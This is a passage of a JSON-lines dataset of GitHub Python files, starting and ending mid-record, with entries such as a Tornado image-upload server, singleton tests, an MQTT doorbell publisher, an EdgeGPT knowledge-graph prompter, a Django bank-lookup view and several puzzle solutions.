True\n\ndef str_list_to_int(str_list: list):\n new_list = []\n for el in str_list:\n if not el.isdigit() or int(el) <= 0:\n return None\n\n new_list.append(int(el))\n\n return new_list\n\ndef get_prime_list(int_list):\n prime_list = []\n\n for el in int_list:\n if is_prime(el) and el not in prime_list:\n prime_list.append(el)\n\n 
return prime_list\n\ndef avg(int_list):\n return round(sum(int_list) / len(int_list), 2)\n\n# The main program starts here\nint_string = input(\"Enter integers separated with commas: \")\nint_list = str_list_to_int(int_string.split(\",\"))\nif int_list is not None:\n print(f\"Input list: {int_list}\")\n int_list.sort()\n print(f\"Sorted list: {int_list}\")\n prime_list = get_prime_list(int_list)\n print(f\"Prime list: {prime_list}\")\n print(f\"Min: {min(int_list)}, Max: {max(int_list)}, Average: {avg(int_list):.2f}\")\nelse:\n print(\"Incorrect input!\")","repo_name":"Illugi317/forritun","sub_path":"Unsorted/a124.py","file_name":"a124.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7435293340","text":"from collections import deque\n\ndef solution(cacheSize, cities):\n answer = 0\n q = deque()\n \n for city in cities :\n if city.upper() in q :\n answer +=1\n q.remove(city.upper())\n else :\n answer +=5\n q.append(city.upper())\n if len(q) > cacheSize :\n q.popleft()\n \n return answer","repo_name":"jaehyun230/Baekjoon_Algorithm","sub_path":"프로그래머스/lv2/17680. [1차] 캐시/[1차] 캐시.py","file_name":"[1차] 캐시.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"16171396644","text":"import tornado.httpserver, tornado.ioloop, tornado.options, tornado.web, os.path, random, string\nfrom tornado.options import define, options\nfrom json import dumps\nfrom predict import verify\n\ndefine(\"port\", default=8888, help=\"run on the given port\", type=int)\n\nimage_path = '/home/ananye/PycharmProjects/AnthroPositive/tmp/img.jpg'\n\nclass Application(tornado.web.Application):\n def __init__(self):\n handlers = [\n (r\"/upload\", ImageHandler)\n ]\n tornado.web.Application.__init__(self, handlers)\n\nclass ImageHandler(tornado.web.RequestHandler):\n def post(self):\n binaryImageData = self.request.arguments['media'][0]\n \n with open(image_path, 'wb') as writer:\n writer.write(binaryImageData)\n\n predictor_dict = self.predictor(image_path)\n self.write(dumps(predictor_dict))\n\n def predictor(self, image_path):\n likelihood, verification = verify(image_path)\n predictDict = dict()\n\n predictDict['Probability'] = str(likelihood)\n predictDict['Image'] = 'HUMAN' if verification == 0 else 'NOT HUMAN'\n\n return predictDict\n\ndef main():\n http_server = tornado.httpserver.HTTPServer(Application())\n http_server.listen(options.port)\n tornado.ioloop.IOLoop.instance().start()\n\nif __name__ == \"__main__\":\n main()","repo_name":"ananyepatel/Project-AnthroPositive","sub_path":"imageTornado.py","file_name":"imageTornado.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37252673781","text":"import unittest\n\nfrom synnefo.lib.singleton import ArgBasedSingleton, ArgBasedSingletonMeta\n\n\nclass SubClassOne(ArgBasedSingleton):\n name = None\n\n def __init__(self, name):\n self.name = name\n\n\nclass SubClassTwo(ArgBasedSingleton):\n name = None\n\n def __init__(self, name):\n self.name = name\n\n\nclass SubClassThree(SubClassTwo):\n name2 = None\n\n def __init__(self, name):\n self.name2 = name\n\n\nclass SubClassKwArgs(ArgBasedSingleton):\n name = None\n\n def __init__(self, onearg, **kwargs):\n self.name = onearg\n for x in kwargs:\n setattr(self, x, kwargs[x])\n\n\nclass 
SubClassNoReinit(ArgBasedSingleton):\n initialized = None\n\n def __init__(self, *args, **kwargs):\n if self.initialized:\n raise Exception(\"__init__ called twice!\")\n self.initialized = True\n\n\nclass ArgBasedSingletonTestCase(unittest.TestCase):\n def test_same_object(self):\n o1 = ArgBasedSingleton()\n o2 = ArgBasedSingleton()\n self.assertTrue(o1 is o2)\n\n\nclass MyMeta(ArgBasedSingletonMeta):\n def __call__(cls, *args, **kw):\n return super(MyMeta, cls).__call__(*args, **kw)\n\n\nclass BaseClass(object):\n __metaclass__ = MyMeta\n\n def ret5(self):\n return 5\n\n\nclass SubClassMultiple(BaseClass, ArgBasedSingleton):\n name = None\n\n def __init__(self, name):\n name = name\n\n\nclass SubClassTestCase(unittest.TestCase):\n def test_same_object(self):\n o1 = SubClassOne('one')\n o2 = SubClassOne('two')\n o1a = SubClassOne('one')\n\n self.assertEqual(o1.name, 'one')\n self.assertEqual(o2.name, 'two')\n self.assertEqual(o1a.name, 'one')\n self.assertFalse(o1 is o2)\n self.assertTrue(o1 is o1a)\n\n def test_different_classes(self):\n o1 = SubClassOne('one')\n o2 = SubClassTwo('one')\n\n self.assertEqual(o1.name, 'one')\n self.assertEqual(o2.name, 'one')\n self.assertFalse(o1 is o2)\n\n\nclass SubClassKwArgsTestCase(unittest.TestCase):\n def test_init_signature(self):\n self.assertRaises(TypeError, SubClassKwArgs, 'one', 'two')\n\n def test_distinct_kwargs(self):\n o1 = SubClassKwArgs('one', a=1)\n o2 = SubClassKwArgs('two')\n o1a = SubClassKwArgs('one', a=2)\n o1b = SubClassKwArgs('one', a=1)\n o1c = SubClassKwArgs('one', a=1, b=2)\n o1d = SubClassKwArgs('one', b=2, a=1)\n\n self.assertEqual(o1.a, 1)\n self.assertEqual(o1a.a, 2)\n self.assertEqual(o1b.a, 1)\n self.assertRaises(AttributeError, getattr, o2, 'a')\n self.assertFalse(o1 is o2)\n self.assertFalse(o1 is o1a)\n self.assertTrue(o1 is o1b)\n self.assertTrue(o1c is o1d)\n\n\nclass SubClassDistinctDicts(unittest.TestCase):\n def test_distinct_storage_per_subclass(self):\n o1 = SubClassOne('one')\n o2 = SubClassTwo('one')\n o1a = SubClassOne('two')\n o2a = SubClassTwo('two')\n\n self.assertEqual(o1.name, 'one')\n self.assertEqual(o2.name, 'one')\n self.assertEqual(o1a.name, 'two')\n self.assertEqual(o2a.name, 'two')\n self.assertTrue(o1._singles is o1a._singles)\n self.assertTrue(o2._singles is o2a._singles)\n self.assertFalse(o1._singles is o2._singles)\n self.assertFalse(o1a._singles is o2a._singles)\n\n\nclass SubClassThreeTestCase(unittest.TestCase):\n def test_singleton_inheritance(self):\n o1 = SubClassThree('one')\n o2 = SubClassThree('two')\n o1a = SubClassThree('one')\n\n self.assertEquals(o1.name2, 'one')\n self.assertEquals(o2.name2, 'two')\n self.assertEquals(o1a.name2, 'one')\n\n self.assertTrue(o1 is o1a)\n self.assertFalse(o1 is o2)\n\n\nclass SubClassMultipleTestCase(unittest.TestCase):\n def test_multiple_inheritance(self):\n o1 = SubClassMultiple('one')\n o2 = SubClassMultiple('two')\n o1a = SubClassMultiple('one')\n\n self.assertEquals(o1.ret5(), 5)\n self.assertEquals(o2.ret5(), 5)\n self.assertEquals(o1a.ret5(), 5)\n\n self.assertTrue(o1 is o1a)\n self.assertFalse(o1 is o2)\n\n\nclass SubClassNoReinitTestCase(unittest.TestCase):\n def test_no_reinit(self):\n o1 = SubClassNoReinit('one')\n o2 = SubClassNoReinit('one')\n\n self.assertTrue(o1 is o2)\n\n\nif __name__ == '__main__':\n 
unittest.main()\n","repo_name":"mpastyl/websocket-console","sub_path":"synnefo/snf-common/synnefo/lib/singleton/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43003205014","text":"import paho.mqtt.client as mqtt\nimport keyboard\nimport os\nimport string\nimport time\nimport random\n\ni = 0\ntemp = ['']\n\nfor i in range(3):\n try:\n f = open(f\"{os.getcwd()}/Messages/message{i}.txt\", 'r')\n temp.append(f.read())\n f.close()\n except (FileNotFoundError, IOError):\n print(f\"File 'message{i}' not found. Please make sure there is a /Messages folder in the root directory and run setup.py\") \n exit()\n\nif(temp[1] == '' or temp[2] == '' or temp[3] == ''):\n print(\"Messages are not set up correctly. Please run the setup.py file.\")\n exit()\n\nmqttBroker = \"mqtt.eclipseprojects.io\"\nclient = mqtt.Client(\"DOORBELL1-PUB\")\nclient.connect(mqttBroker)\n\nwhile True:\n time.sleep(0.2)\n keypress = keyboard.is_pressed(\"e\")\n while ~keypress:\n #This creates a random string of 10 characters. A valid password looks like: AlaBcDeFgHiJ\n key = (''.join(random.choice(string.ascii_letters) for i in range(10)))\n #Key is published to topic. Most vulnerable point of the whole system is this topic.\n client.publish(\"KEY1\", key)\n print(key)\n break\n\n while keypress:\n time.sleep(0.3)\n keypress_1 = keyboard.is_pressed(\"e\")\n if keypress_1: #Here we're concluding the user has held the button for more than a second.\n client.publish(\"DOORBELL1-PUB\", f\"{temp[2]} - {key}\")\n print(f\"{temp[2]} - {key}\")\n os.system(f\"python3 {os.getcwd()}/Publisher.py\")\n exit()\n elif ~keypress_1: #Now, the button was pressed once and then let go.\n print(\"WAITING FOR NEW INPUT\")\n time.sleep(0.5)\n keypress_2 = keyboard.is_pressed(\"e\")\n if keypress_2: #Here we're concluding the user has held the button for more than a second.\n client.publish(\"DOORBELL1-PUB\", f\"{temp[3]} - {key}\")\n print(f\"{temp[3]} - {key}\")\n os.system(f\"python3 {os.getcwd()}/Publisher.py\")\n exit()\n elif ~keypress_2: #Now, the button was pressed once and then let go.\n client.publish(\"DOORBELL1-PUB\", f\"{temp[1]} - {key}\")\n print(f\"{temp[1]} - {key}\")\n os.system(f\"python3 {os.getcwd()}/Publisher.py\")\n exit()","repo_name":"IAmAru/DoorbellProject","sub_path":"Publisher.py","file_name":"Publisher.py","file_ext":"py","file_size_in_byte":2289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30775995691","text":"from __future__ import absolute_import, print_function\n\nimport os.path\nimport unittest\n\nimport anyconfig\n\nfrom tests.common import _bytes as _b, dicts_equal\n\n\n_CURDIR = os.path.dirname(__file__)\n_CID = \"cbor2\" # .. 
seealso:: anyconfig_cbor2_backend/cbor2.py\n\n\nclass Test(unittest.TestCase):\n\n conf_path = os.path.join(_CURDIR, \"res\", \"0.cbor\")\n\n def _load_helper(self, **kwargs):\n try:\n anyconfig.api.load_plugins()\n return anyconfig.load(self.conf_path, **kwargs)\n except anyconfig.UnknownFileTypeError:\n for psr in anyconfig.api.Parsers.list():\n print(\"%r: type=%r, exts=%r\" % (psr, psr.type(),\n psr.extensions()))\n raise\n\n def test_20_load(self):\n cnf = self._load_helper()\n ref = {_b('a'): 0,\n _b('b'): _b('bbb'),\n _b('c'): 5,\n _b('sect0'): {_b('d'): [_b('x'), _b('y'), _b('z')]}}\n self.assertTrue(dicts_equal(cnf, ref))\n\n def test_22_load__explicit_use(self):\n cnf = self._load_helper(ac_parser=_CID)\n ref = {_b('a'): 0,\n _b('b'): _b('bbb'),\n _b('c'): 5,\n _b('sect0'): {_b('d'): [_b('x'), _b('y'), _b('z')]}}\n self.assertTrue(dicts_equal(cnf, ref))\n\n# vim:sw=4:ts=4:et:\n","repo_name":"ssato/python-anyconfig-cbor2-backend","sub_path":"tests/test_plugin.py","file_name":"test_plugin.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23641693421","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom math import ceil, floor\n \ndef line2intlist(line):\n\tlist = line.split(' ')\n\tnumbers = [ int(x) for x in list ]\n\treturn numbers\n\ndef getDist(points, isSurp=False):\n\tp = floor(points / 3.0)\n\ttrip = [p, p, p]\n\tif 3*p < points:\n\t\ttrip[0] += 1\n\tif (3*p + 1) < points:\n\t\ttrip[1] += 1\n\n\ttrip.sort(reverse=True)\n\n\tif isSurp and (trip[1] == trip[0]) and trip[1] > 0:\n\t\ttrip[1] -= 1\n\t\ttrip[0] += 1\n\t\ttrip.sort(reverse=True)\n\n\treturn trip\n \ndef maxGooglers(nrOfGooglers, surprising, p, points):\n\tmg = 0\n\tsurp = 0\n\tfor pi in points:\n\t\ttrip = getDist(pi, True)\n\t\tif ceil(pi/3.0) >= p:\n\t\t\tmg += 1\n\t\telif trip[0] >= p:\n\t\t\tsurp += 1\n\t\n\tmg += min(surp, surprising)\n\n\treturn mg\n \nif __name__ == \"__main__\":\n\ttestcases = input()\n \n\tfor caseNr in xrange(0, testcases):\n\t\toriginalList = line2intlist(raw_input())\n\t\tnrOfGooglers = originalList[0]\n\t\tsurprising = originalList[1]\n\t\tp = originalList[2]\n\t\tpoints = originalList[3:]\n\t\tprint(\"Case #%i: %i\" % (caseNr+1, maxGooglers(nrOfGooglers, surprising, p, points)))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_96/823.py","file_name":"823.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31608693200","text":"import logging\nimport logging.handlers\n\nroot_logger = logging.getLogger()\nroot_logger.setLevel(logging.INFO)\n\n# Some libraries attempt to add their own root logger handlers. 
This is\n# annoying and so we get rid of them.\nfor handler in list(root_logger.handlers):\n root_logger.removeHandler(handler)\n\nlogfmt_str = \"%(asctime)s %(levelname)-8s pid:%(process)d %(name)s:%(lineno)03d:%(funcName)s %(message)s\"\nformatter = logging.Formatter(logfmt_str)\n\nstreamHandler = logging.StreamHandler()\nstreamHandler.setFormatter(formatter)\nstreamHandler.setLevel(logging.DEBUG)\n\nroot_logger.addHandler(streamHandler)\n","repo_name":"deep-learning-with-pytorch/dlwpt-code","sub_path":"util/logconf.py","file_name":"logconf.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":4287,"dataset":"github-code","pt":"61"} +{"seq_id":"9938357170","text":"instructions = [x.strip(\"\\n\") for x in open(\"input.txt\").readlines()]\ncounts = [0] * len(instructions)\ni = 0\nacc = 0\nwhile True:\n instruction = instructions[i]\n operation, arg = instruction.split(\" \")\n arg = int(arg)\n counts[i] += 1\n if counts[i] > 1:\n print(acc)\n break\n\n if operation == \"acc\":\n acc += arg\n i += 1\n elif operation == \"jmp\":\n i += arg\n elif operation == \"nop\":\n i += 1\n","repo_name":"brisutom/AoC2020","sub_path":"08/08_part1.py","file_name":"08_part1.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11316686335","text":"\r\n\r\n\r\ndef calcTime(amount, goal, rate):\r\n\tif amount < goal:\r\n\t\treturn (goal-amount)/rate\r\n\treturn 0\r\n\r\n\r\n\r\n\r\n\r\ninc = 1.3\r\nnames = ['curse jar', 'card collection', 'sons college fund', 'government bonds', 'wine collection', 'money printer', 'timeshares', 'pizza franchaise', 'condo development', 'film production', 'pharmaceuticals', 'ponzi scheme', 'startup incubator', 'microloans', 'utility monopoly', 'carbon credit', 'peer to peer lending', 'pneumatic tube transportation', 'time machine technology']\r\nprices = [14600, 217100, 32.1e6, 47.1e3, 136.2e6, 2.1e6, 3.8e6, 20.7e6, 504.4e6, 1.6e9, 376e9, 6.1e12, 3.1e12, 18.9e12, 96.5e12, 352.7e12, 1e15, 25e15, 400e15]\r\npays = [1, 2, 5, 16, 50, 200, 800, 3e3, 10.5e3, 28e3, 75e3, 2.2e6, 10e6, 300e6, 15.2e9, 60.2e9, 100e9, 15e12, 2e15]\r\nlevels = [0 for i in range(19)]\r\n\r\ngoal = 2e15\r\nrate = 396.4e9\r\ntime = 0\r\n\r\n\r\nwhile rate*100 < goal:\r\n\ttimes = [1e20 for i in range(19)]\r\n\tfor i in range(13, 19):\r\n\t\tprice = prices[i]*inc**levels[i]\r\n\t\ttimes[i] = calcTime(0, price, rate) + calcTime(0, goal, rate+pays[i])\r\n\tminTime = times.index(min(times))\r\n\ttime += calcTime(0, prices[minTime]*inc**levels[minTime], rate)\r\n\trate += pays[minTime]\r\n\tlevels[minTime] += 1\r\n\tprint(names[minTime], rate, rate/goal, time)\r\n\tinput()\r\n\r\n\r\nprint(time)","repo_name":"maxbergmark/old-work","sub_path":"Egna projekt/moneymaker.py","file_name":"moneymaker.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25257210519","text":"import os\nimport re\nimport asyncio\nimport json\nfrom EdgeGPT.EdgeGPT import Chatbot, ConversationStyle\n\nclass FileHandler:\n def __init__(self, args, file_dir=None):\n if file_dir is None:\n self.file_dir = 'log/' + args.title + '/'\n self.make_dir(self.file_dir)\n \n def make_dir(self, path):\n if not os.path.exists(path):\n print('make dir: ' + path)\n os.makedirs(path)\n \n def save_to_file(self, path, data):\n with open(path, 'w', encoding='utf-8') as f:\n f.write(data)\n \n \nclass 
DialogueHandler:\n def __init__(self, args):\n # flags\n self.file_hundler = FileHandler(args=args)\n \n self.finish_asking_node = False\n self.ask_node_once = False\n self.finish_asking_edge = False\n self.ask_edge_once = False\n self.finish_asking_node_info = False\n self.ask_node_info_once = False\n self.finish_asking_node_group = False\n self.ask_node_group_once = False\n self.finish_asking_node_importance = False\n self.ask_node_importance_once = False\n \n \n # self.finish_asking_edge_info = False\n # self.ask_edge_info_once = False\n \n if args.lang == 'ja':\n self.scripts = {\n 'ask_prefix':'についての知識グラフを作成したいです.',\n 'ask_node':'知識グラフに現れるノードを出力してください.',\n 'ask_edge':'知識グラフに現れるエッジを出力してください.',\n 'ask_node_info':'ノードの情報を出力してください.',\n 'ask_node_group':'教えていただいたノードをいくつかのグループに分けてください.',\n 'ask_node_importance':'ノードの重要度を0.0から1.0の間で教えてください.',\n 'ask_tail':'以下の形式で出力してください.\\n',\n 'ask_again':'指定した形式で出力しなおしてください.\\n',\n 'ask_node_eg':\"例'''\\n- 桃太郎\\n- サル\\n- 犬\\n'''\",\n 'ask_edge_eg':\"例'''\\n- 桃太郎, 仲間にする, サル\\n- 桃太郎, 仲間にする, 犬\\n'''\",\n 'ask_node_info_eg':\"例'''\\n- 桃太郎:桃から生まれた主人公.鬼を退治しに鬼ヶ島に向かう.\\n'''\",\n 'ask_node_group_eg':\"例'''\\n- 桃太郎:仲間\\n- サル:仲間\\n- 鬼:敵\\n'''\",\n 'ask_node_importance_eg':\"例'''\\n- 桃太郎:0.5\\n- サル:0.5\\n- 鬼:0.0\\n'''\",\n }\n elif args.lang == 'en':\n self.scripts = {\n 'ask_prefix':'I want to make a knowledge graph about ',\n 'ask_node':'Please output the nodes that appear in the knowledge graph as much as possible',\n 'ask_edge':'Please output the edges that appear in the knowledge graph.',\n 'ask_node_info':'Please output the information of the node.',\n 'ask_node_group':'Please divide the nodes you taught into some groups.',\n 'ask_node_importance':'Please tell me the importance of the node between 0.0 and 1.0.',\n 'ask_tail':'Please output in the following format.\\n',\n 'ask_again':'Please output again in the specified format.\\n',\n 'ask_node_eg':\"Example\\n'''\\n- Momotaro\\n- Monkey\\n- Dog\\n'''\",\n 'ask_edge_eg':\"Example\\n'''\\n- Momotaro, make friends, Monkey\\n- Momotaro, make friends, Dog\\n'''\",\n 'ask_node_info_eg':\"Example\\n'''\\n- Momotaro: The main character born from a peach. 
He goes to Onigashima to defeat the demon.\\n'''\",\n 'ask_node_group_eg':\"Example\\n'''\\n- Momotaro:Friends\\n- Monkey:Friends\\n- Demon:Enemy\\n'''\",\n 'ask_node_importance_eg':\"Example\\n'''\\n- Momotaro:0.5\\n- Monkey:0.5\\n- Demon:0.0\\n'''\",\n }\n \n def whether_Prompter_ask_node_correctly(self, output_text_from_bot):\n self.ask_node_once = True\n correct_pattern = r'^-\\s(.+)$'\n ans = re.findall(correct_pattern, output_text_from_bot, re.MULTILINE)\n if ans != []:\n self.finish_asking_node = True\n path = self.file_hundler.file_dir + 'node.txt'\n self.file_hundler.save_to_file(path, output_text_from_bot)\n return ans\n \n def whether_Prompter_ask_edge_correctly(self, output_text_from_bot):\n self.ask_edge_info_once = True\n correct_pattern = r'^-\\s(.+)$'\n ans = re.findall(correct_pattern, output_text_from_bot, re.MULTILINE)\n if ans:\n self.finish_asking_edge = True\n path = self.file_hundler.file_dir + 'edge.txt'\n self.file_hundler.save_to_file(path, output_text_from_bot)\n return ans\n \n def whether_Prompter_ask_node_info_correctly(self, output_text_from_bot):\n self.ask_node_info_once = True\n correct_pattern = r'^-\\s(.+):(.+)$'\n ans = re.findall(correct_pattern, output_text_from_bot, re.MULTILINE)\n if ans:\n self.finish_asking_node_info = True\n path = self.file_hundler.file_dir + 'node_info.txt'\n self.file_hundler.save_to_file(path, output_text_from_bot)\n return ans\n \n def whether_Prompter_ask_node_group_correctly(self, output_text_from_bot):\n self.ask_node_group_once = True\n correct_pattern = r'^-\\s(.+):(.+)$'\n ans = re.findall(correct_pattern, output_text_from_bot, re.MULTILINE)\n if ans:\n self.finish_asking_node_group = True\n path = self.file_hundler.file_dir + 'node_group.txt'\n self.file_hundler.save_to_file(path, output_text_from_bot)\n return ans\n \n def whether_Prompter_ask_node_importance_correctly(self, output_text_from_bot):\n self.ask_node_importance_once = True\n correct_pattern = r'^-\\s(.+):(.+)$'\n ans = re.findall(correct_pattern, output_text_from_bot, re.MULTILINE)\n if ans:\n self.finish_asking_node_importance = True\n path = self.file_hundler.file_dir + 'node_importance.txt'\n self.file_hundler.save_to_file(path, output_text_from_bot)\n return ans\n \n # def whether_Prompter_ask_edge_info_correctly(self, output_text_from_bot):\n # self.ask_edge_info_once = True\n # correct_pattern\n \n \n def return_next_prompt(self, output_text_from_bot=None, title=None):\n \n # nodeについての質問作成部分\n if self.finish_asking_node == False:\n if self.ask_node_once == False: # 初めの質問\n self.ask_node_once = True\n return title + self.scripts['ask_prefix'] + self.scripts['ask_node'] + self.scripts['ask_tail'] + self.scripts['ask_node_eg']\n self.whether_Prompter_ask_node_correctly(output_text_from_bot)\n if self.ask_node_once == True and self.finish_asking_node == False: # node一覧について聞き直す\n return self.scripts['ask_again'] + self.scripts['ask_node_eg']\n \n # edgeについての質問作成部分\n if self.finish_asking_node == True and self.finish_asking_edge == False:\n if self.ask_edge_once == False: # edgeについて初めての質問\n self.ask_edge_once = True\n return title + self.scripts['ask_prefix'] + self.scripts['ask_edge'] + self.scripts['ask_tail'] + self.scripts['ask_edge_eg']\n self.whether_Prompter_ask_edge_correctly(output_text_from_bot)\n if self.ask_edge_once == True and self.finish_asking_edge == False:\n return self.scripts['ask_again'] + self.scripts['ask_edge_eg']\n \n # node_infoについての質問作成部分\n if self.finish_asking_node == True and self.finish_asking_edge == True and 
self.finish_asking_node_info == False:\n if self.ask_node_info_once == False:\n self.ask_node_info_once = True\n return title + self.scripts['ask_prefix'] + self.scripts['ask_node_info'] + self.scripts['ask_tail'] + self.scripts['ask_node_info_eg'] # node_infoについて初めての質問\n self.whether_Prompter_ask_node_info_correctly(output_text_from_bot)\n if self.ask_node_info_once == True and self.finish_asking_node_info == False:\n return self.scripts['ask_again'] + self.scripts['ask_node_info_eg']\n \n # node_groupについての質問作成部分\n if self.finish_asking_node == True and self.finish_asking_edge == True and self.finish_asking_node_info == True and self.finish_asking_node_group == False:\n if self.ask_node_group_once == False:\n self.ask_node_group_once = True\n return title + self.scripts['ask_prefix'] + self.scripts['ask_node_group'] + self.scripts['ask_tail'] + self.scripts['ask_node_group_eg'] # node_groupについて初めての質問\n self.whether_Prompter_ask_node_group_correctly(output_text_from_bot)\n if self.ask_node_group_once == True and self.finish_asking_node_group == False:\n return self.scripts['ask_again'] + self.scripts['ask_node_group_eg']\n \n # node_importanceについての質問作成部分\n if self.finish_asking_node == True and self.finish_asking_edge == True and self.finish_asking_node_info == True and self.finish_asking_node_group == True and self.finish_asking_node_importance == False:\n if self.ask_node_importance_once == False:\n self.ask_node_importance_once = True\n return title + self.scripts['ask_prefix'] + self.scripts['ask_node_importance'] + self.scripts['ask_tail'] + self.scripts['ask_node_importance_eg'] # node_importanceについて初めての質問\n self.whether_Prompter_ask_node_importance_correctly(output_text_from_bot)\n if self.ask_node_importance_once == True and self.finish_asking_node_importance == False:\n return self.scripts['ask_again'] + self.scripts['ask_node_importance_eg'] \n \n return 'everything is finished.'\n \n \n \n \nclass ChatbotPrompter:\n def __init__(self, args):\n if args.title is None:\n self.title = input(\"Enter title: \")\n else:\n self.title = args.title\n \n self.dialogue_handler = DialogueHandler(args)\n \n async def main(self):\n script_dir = os.path.dirname(os.path.abspath(__file__))\n cookie_path = os.path.join(script_dir, 'bing_cookies_.json')\n cookies = json.loads(open(cookie_path, encoding=\"utf-8\").read())\n bot = await Chatbot.create(cookies=cookies)\n \n prompt = self.dialogue_handler.return_next_prompt(title=self.title)\n response = await bot.ask(prompt=prompt, conversation_style=ConversationStyle.creative, simplify_response=True)\n print(response['text'])\n \n while True:\n prompt = self.dialogue_handler.return_next_prompt(response['text'], self.title)\n if prompt == 'everything is finished.':\n break\n response = await bot.ask(prompt=prompt, conversation_style=ConversationStyle.creative, simplify_response=True)\n print(response['text'])\n await bot.close()\n\nif __name__ == \"__main__\":\n bot = ChatbotPrompter(\"三匹の子豚\")\n asyncio.run(bot.main())","repo_name":"u109755b/mm-enshu-2023","sub_path":"mm_enshu_2023_download.py","file_name":"mm_enshu_2023_download.py","file_ext":"py","file_size_in_byte":11854,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"29543997145","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .models import banks, bank_branches\nfrom .forms import IFSCForm, BANKSForm\n\ndef index(request): \n if request.method == \"GET\": \n return render(request, 
\"index.html\" , {\"result\": False})\n \n elif request.method == \"POST\":\n if request.POST.dict()[\"FORMNAME\"] == \"IFSC\":\n form1 = IFSCForm(request.POST)\n \n if form1.is_valid():\n num = form1.cleaned_data['IFSC']\n num = str(num).upper()\n details = bank_branches.objects.filter(ifsc=num)\n if(len(details) != 0):\n return render(request, \"index.html\" , {\"query_results\":details, \"result\": True})\n return render(request, \"index.html\", {\"result\": False})\n \n elif request.POST.dict()[\"FORMNAME\"] == \"BANK\":\n form1 = BANKSForm(request.POST)\n if form1.is_valid():\n bname = form1.cleaned_data[\"BANKNAME\"]\n cityname = form1.cleaned_data[\"CITYNAME\"]\n bname = str(bname).upper()\n cityname = str(cityname).upper()\n details = bank_branches.objects.filter(bank_name = bname, city = cityname)\n if(len(details) != 0):\n return render(request, \"index.html\" , {\"query_results\":details, \"result\": True})\n return render(request, \"index.html\", {\"result\": False})\n \n \ndef load_dataset(request):\n return HttpResponse(\"loaded\")\n","repo_name":"rupanshugoyal/Credicxobank","sub_path":"banks/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13015994369","text":"__author__ = 'spencertank'\nfrom django.conf.urls import patterns, url, include\nfrom rest_framework import routers\nfrom home import views\n\nrouter = routers.DefaultRouter()\nrouter.register(r'users', views.UserViewSet)\nrouter.register(r'groups', views.GroupViewSet)\nrouter.register(r'teams', views.TeamViewSet)\nrouter.register(r'stadiums', views.StadiumViewSet)\n\nurlpatterns = patterns('',\n url(r'^$', views.base, name='base'),\n url(r'^api/', include(router.urls)),\n url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework'))\n\n)","repo_name":"Sktank/Worldcup","sub_path":"home/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23384747311","text":"def testLine(fourCharacters):\r\n if all([character == \"X\" or character == \"T\" for character in fourCharacters]):\r\n return \"X\"\r\n if all([character == \"O\" or character == \"T\" for character in fourCharacters]):\r\n return \"O\"\r\n else:\r\n return False\r\n\r\ninputFile = open(\"A-small-attempt1.in\", \"r\")\r\n#inputFile = open(\"QualificationAsmall.in\", \"r\")\r\n\r\noutputFile = open(\"QualificationAsmall.txt\", \"w\")\r\n\r\ncases = int(inputFile.readline().strip())\r\nboards = inputFile.read().split(\"\\n\\n\")\r\nfor caseIndex in range(1, cases + 1):\r\n finalResult = \"\"\r\n currentBoard = boards[caseIndex - 1].split(\"\\n\")\r\n for lineIndex in range(4):\r\n result = testLine(currentBoard[lineIndex])\r\n if result:\r\n finalResult = \"%s won\" % result\r\n\r\n result = testLine([currentBoard[line][lineIndex] for line in range(4)])\r\n if result:\r\n finalResult = \"%s won\" % result\r\n\r\n result = testLine([currentBoard[index][index] for index in range(4)])\r\n if result:\r\n finalResult = \"%s won\" % result\r\n result = testLine([currentBoard[index][3 - index] for index in range(4)])\r\n if result:\r\n finalResult = \"%s won\" % result\r\n\r\n if not finalResult:\r\n if all([\".\" not in line for line in currentBoard]):\r\n finalResult = \"Draw\"\r\n else:\r\n finalResult = \"Game has not completed\"\r\n outputFile.write(\"Case #%d: %s\\n\" % (caseIndex, 
